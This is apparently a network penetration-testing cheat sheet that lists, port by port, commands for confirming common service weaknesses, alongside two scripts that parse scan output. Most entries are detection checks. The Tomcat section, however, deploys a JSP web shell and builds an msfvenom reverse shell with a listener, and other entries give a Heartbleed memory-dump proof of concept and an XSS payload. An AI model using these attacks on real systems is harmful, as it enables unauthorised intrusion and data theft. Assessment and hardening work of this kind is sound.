Penetration Testing - Network


Manual Vulnerability Assessment

TCP/21: FTP

Anonymous FTP Enabled
anonymous
guest

TCP/22: SSH

nmap -p 22 --script ssh2-enum-algos <ip_address>

SSH Weak Algorithms Supported
SSH Server CBC Mode Ciphers Enabled
ssh -oCiphers=<ciphers> <ip_address>
SSH Weak MAC Algorithms Enabled
ssh -oMACs=<algorithm> <ip_address>
SSH Protocol v1 Supported
ssh -1 <ip_address> -v

Hardening on SSH
Ciphers aes256-ctr,aes192-ctr,aes128-ctr
MACs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512,hmac-sha2-256,umac-128@openssh.com
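As an added example (not from the original post), the script below parses the output of the ssh2-enum-algos scan shown above and flags every offered cipher or MAC that is not on the hardening allow-lists just given; the scan output embedded in it is constructed, not captured from a real host.

```python
import re

# Hardened allow-lists, copied from the "Hardening on SSH" block above.
ALLOWED_CIPHERS = {"aes256-ctr", "aes192-ctr", "aes128-ctr"}
ALLOWED_MACS = {
    "hmac-sha2-512-etm@openssh.com", "hmac-sha2-256-etm@openssh.com",
    "umac-128-etm@openssh.com", "hmac-sha2-512", "hmac-sha2-256",
    "umac-128@openssh.com",
}

# Constructed sample of `nmap -p 22 --script ssh2-enum-algos` output (not a real host).
SAMPLE = """\
| ssh2-enum-algos:
|   encryption_algorithms: (4)
|       aes128-ctr
|       aes256-ctr
|       aes128-cbc
|       3des-cbc
|   mac_algorithms: (3)
|       hmac-sha2-256
|       hmac-sha1
|_      hmac-md5
"""

def parse_enum_algos(text):
    """Return {section: [algorithms]} from ssh2-enum-algos script output."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.lstrip("|_ ").rstrip()  # drop nmap's "|" / "|_" gutter
        if not line or line.startswith("ssh2-enum-algos"):
            continue
        header = re.match(r"^(\w+):\s*\(\d+\)$", line)  # e.g. "mac_algorithms: (3)"
        if header:
            current = header.group(1)
            sections[current] = []
        elif current:
            sections[current].append(line)
    return sections

def audit(sections):
    """Map each offered cipher/MAC outside the allow-lists to the finding it triggers."""
    findings = {}
    for cipher in sections.get("encryption_algorithms", []):
        if cipher not in ALLOWED_CIPHERS:
            findings[cipher] = "CBC mode cipher" if cipher.endswith("-cbc") else "weak cipher"
    for mac in sections.get("mac_algorithms", []):
        if mac not in ALLOWED_MACS:
            findings[mac] = "weak MAC"
    return findings
```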

TCP/23: Telnet

Unencrypted Telnet Server
telnet <ip_address> 23

TCP/25: SMTP

SMTP Service Cleartext Login Permitted
telnet <ip_address> 25
EHLO <ip_address>
AUTH LOGIN

Mail server answers to VRFY and EXPN requests
nc <ip_address> 25
EXPN root
VRFY root

TCP/53: DNS

DNS Server Cache Snooping Remote Information Disclosure
nmap -sU -p 53 --script dns-cache-snoop <ip_address>
nslookup example.com <ip_address>

DNS Server Recursive Query Cache Poisoning Weakness
nmap -Pn -sU -p 53 --script=dns-recursion <ip_address>

DNS Server Spoofed Request Amplification DDoS
msf > use auxiliary/scanner/dns/dns_amp
dig . NS @<ip_address>

DNS Server Zone Transfer Information Disclosure (AXFR)
dig axfr @<ip_address> <domain.name>

MS11-058: Vulnerabilities in DNS Server Could Allow Remote Code Execution (2562485) (uncredentialed check)
MS12-017: Vulnerability in DNS Server Could Allow Denial of Service (2647170) (uncredentialed check)
dig @<ip_address> version.bind txt chaos

TCP/79: Finger

Finger 0@host Information Disclosure
msf > use auxiliary/scanner/finger/finger_users

TCP/80: HTTP

HTTP TRACE / TRACK Methods Allowed
curl -v -X TRACE <ip_address>:<port>

MS15-034: Vulnerability in HTTP.sys Could Allow Remote Code Execution (3042553) (uncredentialed check)
Vulnerable: HTTP/1.1 416 Requested Range Not Satisfiable
curl -v <ip_address>:<port>/ -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615"

Apache Server ETag Header Information Disclosure
curl -v -X GET <ip_address>:<port>

Please refer to https://www.axcelsec.com/2017/12/web-server-hardening-apache.html for more information.

TCP/110: POP3

POP3 Cleartext Logins Permitted
telnet <ip_address> 110
USER testuser
PASS 123456

TCP/389: Lightweight Directory Access Protocol (LDAP)

LDAP NULL BASE Search Access
ldapsearch -h <ip_address> -x -s base

TCP/443: HTTPS

sslscan <ip_address>

SSL Version 2 and 3 Protocol Detection
openssl s_client -connect <ip_address>:<port> -ssl3

SSLv3 Padding Oracle On Downgraded Legacy Encryption Vulnerability (POODLE)
TARGET=<ip_address>:<port>
if ! echo | timeout 3 openssl s_client -connect "$TARGET" >/dev/null 2>&1; then
  echo "UNKNOWN: $TARGET timeout or connection error"
elif echo | openssl s_client -connect "$TARGET" -ssl3 2>&1 | grep -q "sslv3 alert handshake failure\|SSL3_GET_RECORD:wrong version number"; then
  echo "OK: $TARGET not vulnerable"
else
  echo "FAIL: $TARGET vulnerable; SSLv3 connection accepted"
fi
Note: an openssl build compiled without SSLv3 support rejects the -ssl3 option, in which case this check is inconclusive rather than a FAIL.

Heartbleed
python heartbleed-poc.py -n100 -f dump.bin <ip_address>
msf > use auxiliary/scanner/ssl/openssl_heartbleed

SSL/TLS Diffie-Hellman Modulus <= 1024 Bits (Logjam)
openssl s_client -connect <ip_address>:<port_no> -cipher 'EXP'
SSL Certificate Chain Contains RSA Keys Less Than 2048 bits
openssl s_client -connect <ip_address>:<port> 2>/dev/null | openssl x509 -text -noout | grep "Public-Key"
SSL Certificate Signed Using Weak Hashing Algorithm
openssl s_client -connect <ip_address>:<port> 2>/dev/null | openssl x509 -text -noout | grep "Signature Algorithm"
SSL Certificate Expiry
openssl s_client -connect <ip_address>:<port> 2>/dev/null | openssl x509 -noout -dates

SSL Certificate with Wrong Hostname
nmblookup -A <ip_address> | grep '<00' | grep -v GROUP | awk '{print $1}'
Compare the NetBIOS host name returned with the CN / SAN in the certificate.

SSL / TLS Renegotiation Handshakes MiTM Plaintext Data Injection
openssl s_client -connect <ip_address>:<port> | grep "Renegotiation"
Vulnerable: Secure Renegotiation IS NOT supported

SSL 64-bit Block Size Cipher Suites Supported (SWEET32)
openssl s_client -connect <ip_address>:<port> -cipher DES-CBC3-SHA
SSL RC4 Cipher Suites Supported (Bar Mitzvah)
openssl s_client -connect <ip_address>:<port> -cipher RC4-MD5
openssl s_client -connect <ip_address>:<port> -cipher RC4-SHA
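As an added example (not from the original post), the following script maps lines of sslscan output to the findings listed in this section (SSLv2/SSLv3 detection, POODLE, Logjam/export ciphers, SWEET32, RC4); the sslscan output embedded in it is constructed, not from a real host, and the classification rules are assumptions drawn from the cipher names this section tests with openssl.

```python
import re

# Constructed sample of `sslscan <ip_address>` output (not from a real host).
SAMPLE = """\
  SSL/TLS Protocols:
SSLv2     disabled
SSLv3     enabled
TLSv1.0   enabled
TLSv1.2   enabled

  Supported Server Cipher(s):
Preferred TLSv1.2  256 bits  ECDHE-RSA-AES256-GCM-SHA384   Curve 25519 DHE 253
Accepted  TLSv1.2  128 bits  DHE-RSA-AES128-SHA            DHE 1024 bits
Accepted  TLSv1.2  112 bits  DES-CBC3-SHA
Accepted  TLSv1.0  128 bits  RC4-SHA
Accepted  TLSv1.0  40 bits   EXP-RC4-MD5
"""

PROTO_RE = re.compile(r"^(SSLv2|SSLv3|TLSv1\.\d)\s+(enabled|disabled)$")
CIPHER_RE = re.compile(r"^(?:Preferred|Accepted)\s+\S+\s+\d+ bits\s+(\S+)(.*)$")
DHE_RE = re.compile(r"DHE (\d+) bits")  # sslscan's ephemeral DH group size note

def classify(text):
    """Return {finding: [evidence]} using the finding names from this section."""
    findings = {}

    def add(name, evidence):
        findings.setdefault(name, []).append(evidence)

    for line in text.splitlines():
        line = line.strip()
        proto = PROTO_RE.match(line)
        if proto:
            if proto.group(2) == "enabled" and proto.group(1).startswith("SSLv"):
                add("SSL Version 2 and 3 Protocol Detection", proto.group(1))
                if proto.group(1) == "SSLv3":
                    add("POODLE", proto.group(1))
            continue
        cipher = CIPHER_RE.match(line)
        if not cipher:
            continue
        suite, extra = cipher.groups()
        if "DES-CBC3" in suite or "3DES" in suite:  # 64-bit block cipher
            add("SWEET32", suite)
        if "RC4" in suite:
            add("Bar Mitzvah (RC4)", suite)
        dhe = DHE_RE.search(extra)
        if suite.startswith("EXP-") or (dhe and int(dhe.group(1)) <= 1024):
            add("Logjam (DH <= 1024 bits / export cipher)", suite)
    return findings
```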

ESXi Multiple Vulnerabilities
nmap --script vmware-version -p443 <ip_address>
https://<ip_address>/sdk/vim.wsdl
POST https://<ip_address>/sdk
<soap:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Header>
 <operationID>00000001-00000001</operationID>
</soap:Header>
<soap:Body>
 <RetrieveServiceContent xmlns="urn:internalvim25">
  <_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this>
 </RetrieveServiceContent>
</soap:Body>
</soap:Envelope>

Microsoft Exchange Server Unsupported Version Detection (Uncredentialed)
view-source:https://<ip_address>/owa

Microsoft Exchange Client Access Server Information Disclosure
openssl s_client -host <ip_address> -port 443

GET /autodiscover/autodiscover.xml HTTP/1.0
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
Accept-Language: en
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
The HTTP response header WWW-Authenticate: Basic realm discloses the server's internal IP address.

MS11-061: Vulnerability in Remote Desktop Web Access Could Allow Elevation of Privilege (2546250) (uncredentialed check)
https://<ip_address>/RDWeb/Pages/en-US/login.aspx?ReturnUrl=%22%20onmouseover%3d%22javascript%3aalert(%27Cross-site%20Scripting%27)

TCP/445: SMB

Microsoft Windows SMB NULL Session Authentication
rpcclient -U "" <ip_address>
smbclient -L <ip_address>

Exploitation:
smbclient //<ip_address>/IPC$ -N

SMB Signing Required
SMB Signing Disabled
nmap --script smb-security-mode -p445 <ip_address>

Microsoft Windows SMBv1 Multiple Vulnerabilities
nmap --script smb-protocols <ip_address>

MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)
nmap -p445 --script smb-vuln-ms17-010 <ip_address>

Concept
Request: Tree Connect AndX Request, Path: \\<IP_Address>\IPC$
Response: Tree Connect AndX Response

Request: PeekNamedPipe Request, FID: 0x0000
Response: Trans Response, Error: STATUS_INSUFF_SERVER_RESOURCES

For a deeper understanding of SMB security, please read the article Server Message Block (SMB) Security.

TCP/512: Remote Process Execution

Rexecd Service Enabled
nmap <ip_address> --script rexec-brute -p512

TCP/1521: Oracle Database Default Listener

Oracle TNS Listener Remote Poisoning
msf > use auxiliary/scanner/oracle/tnspoison_checker

TCP/2049: Network File System (NFS)

NFS Shares World Readable
nmap -sV --script=nfs-showmount <ip_address>
apt-get install nfs-common
showmount -e <ip_address>
mount -t nfs <ip_address>:/<directory> <local directory> -o nolock

TCP/8080: Apache Tomcat

Tomcat Application Manager Login

Exploitation:
auxiliary/scanner/http/tomcat_mgr_login

\fuzzdb-master\web-backdoors\jsp\laudanum\cmd.war
http://<target IP>:8080/cmd/cmd.jsp?cmd=whoami

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Local IP> LPORT=4444 -f war > shell.war
nc -l -v -p 4444

TCP/3389: Remote Desktop Connection (RDP)

Terminal Services Encryption Level is Medium or Low
nmap -Pn --script rdp-enum-encryption -p3389 <ip_address>
Concept
Request: ClientData
Response: ServerData - ServerSecurityData - encryptionLevel

Encryption Level
1. Low
2. Client Compatible (Default)
3. High
4. FIPS Compliant

Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness
perl rdp-sec-check.pl <ip_address>
cpan Encoding::BER

Terminal Services Doesn't Use Network Level Authentication (NLA) Only
rdesktop <ip_address>

MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution
nmap -p3389 --script rdp-vuln-ms12-020 <ip_address>

MS14-066: Vulnerability in Schannel Could Allow Remote Code Execution (2992611) (uncredentialed check)
git clone https://github.com/anexia-it/winshock-test.git
./winshock_test.sh <ip_address> <port>

Concept
MS14-066 introduced four new cipher suites, so a check can be made for whether the target system supports these previously unsupported suites.
  • DHE-RSA-AES256-GCM-SHA384
  • DHE-RSA-AES128-GCM-SHA256
  • AES256-GCM-SHA384
  • AES128-GCM-SHA256
winshock_test.sh uses this fact by simply checking whether the target system supports those cipher suites. If they are supported, the patch has been applied.

For a deeper understanding of RDP security, please read the article Remote Desktop Protocol (RDP) Security.

UDP/123: NTP

Network Time Protocol (NTP) Mode 6 Scanner
ntpq -c rv <ip_address>
nmap -sU -p 123 --script ntp-info <ip_address>
A hardened server should not respond to this query.

Network Time Protocol Daemon (ntpd) monlist Command Enabled DoS
ntpdc -n -c monlist <ip_address>
Returns the list of recent hosts that connected to this NTP server.

UDP/161: SNMP

SNMP Agent Default Community Name (public)
onesixtyone <ip_address> -c /usr/share/doc/onesixtyone/dict.txt
./snmpcheck-1.8.pl -t <ip_address> -c public

UDP/500: ISAKMP

Internet Key Exchange (IKE) Aggressive Mode with Pre-Shared Key
ike-scan <ip_address> --id=test -A

UDP/5353: mDNS

mDNS Detection
dig @<ip_address> -p 5353 -t ptr _services._dns-sd._udp.local

Other Useful Commands

Update nmap and metasploit

apt update; apt install metasploit-framework
apt-get install nmap
